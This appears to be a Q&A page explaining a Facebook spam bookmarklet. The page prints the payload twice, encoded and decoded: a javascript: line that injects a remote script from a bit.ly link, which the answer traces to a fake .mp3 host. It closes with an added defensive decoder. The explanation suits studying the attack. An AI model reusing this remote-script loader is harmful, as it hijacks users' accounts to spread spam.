
Explanation of Facebook spam code


So, I've just seen this spam code on Facebook, written in JavaScript and I wondered if someone could explain to me how the code works, and interacts with Facebook. I do not intend to use this for malicious purposes, but I am simply interested in the security of websites like Facebook. Here is the code that is executed from the address bar (I suggest not trying it yourself, you may end up with a few annoyed friends).

javascript:    (a%3D(b%3Ddocument).createElement('script')).src%3D'http%3A%2F%2Fbit.ly%2FFB1337%20%20%3F'%2BMath.random()%2Cb.body.appendChild(a)%3Bvoid(0)

Solution

  • Check it here; the link is URL-encoded:

    http://meyerweb.com/eric/tools/dencoder/

    javascript:

    (a=(b=document).createElement('script')).src='http://bit.ly/FB1337?'+Math.random(),b.body.appendChild(a);void(0)
    

    From what I see: load this URL as a script and add it to the current page.

    Edit: The script loaded is placed at this url: http://www.raxarstudios.com/x/audiotrack2.mp3

    It's masqueraded as an mp3 song, but it's just JavaScript: http://pastebin.com/RVmNVtt9. I've quickly glanced at it; it apparently uses some heavy AJAX to add events and to join yourself to them.
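To see what the answer describes without pasting anything into a browser, here is an added example (not code from the question or the answer) that percent-decodes the address-bar payload and reports the remote script it would load; the function name `analyzeBookmarklet` and the report fields are my own.

```javascript
// Added example: decode a "javascript:" address-bar payload like the one in
// the question and report which remote script it loads. The helper name and
// the shape of the returned report are assumptions of this example.

// Constructed sample: the payload from the question, copied verbatim.
const SPAM_PAYLOAD =
  "javascript:    (a%3D(b%3Ddocument).createElement('script')).src%3D" +
  "'http%3A%2F%2Fbit.ly%2FFB1337%20%20%3F'%2BMath.random()%2Cb.body.appendChild(a)%3Bvoid(0)";

function analyzeBookmarklet(payload) {
  // Drop the javascript: scheme, then undo the percent-encoding that makes the
  // code look like an opaque URL in the address bar.
  const body = payload.replace(/^javascript:\s*/i, "");
  let decoded;
  try {
    decoded = decodeURIComponent(body);
  } catch (e) {
    // Truncated or malformed %XX sequences throw a URIError.
    return { ok: false, reason: "malformed percent-encoding" };
  }
  // Tell-tale pattern from the answer: a <script> element is created and appended.
  const createsScript = /createElement\(\s*['"]script['"]\s*\)/.test(decoded);
  const appends = /\.appendChild\(/.test(decoded);
  // The remote script is the string literal assigned to .src.
  const srcMatch = decoded.match(/\.src\s*=\s*['"]([^'"]*)['"]/);
  const scriptUrl = srcMatch ? srcMatch[1] : null;
  // A random query string defeats caching, so every victim fetches a fresh copy
  // and whoever hosts the script can change it at any time.
  const cacheBuster = /Math\.random\(\)/.test(decoded);
  // A link shortener hides the real host (the answer found an ".mp3" URL behind it).
  const shortener = scriptUrl ? /^https?:\/\/bit\.ly\//i.test(scriptUrl) : false;
  return { ok: true, decoded, createsScript, appends, scriptUrl, cacheBuster, shortener };
}

const report = analyzeBookmarklet(SPAM_PAYLOAD);
console.log(report);
```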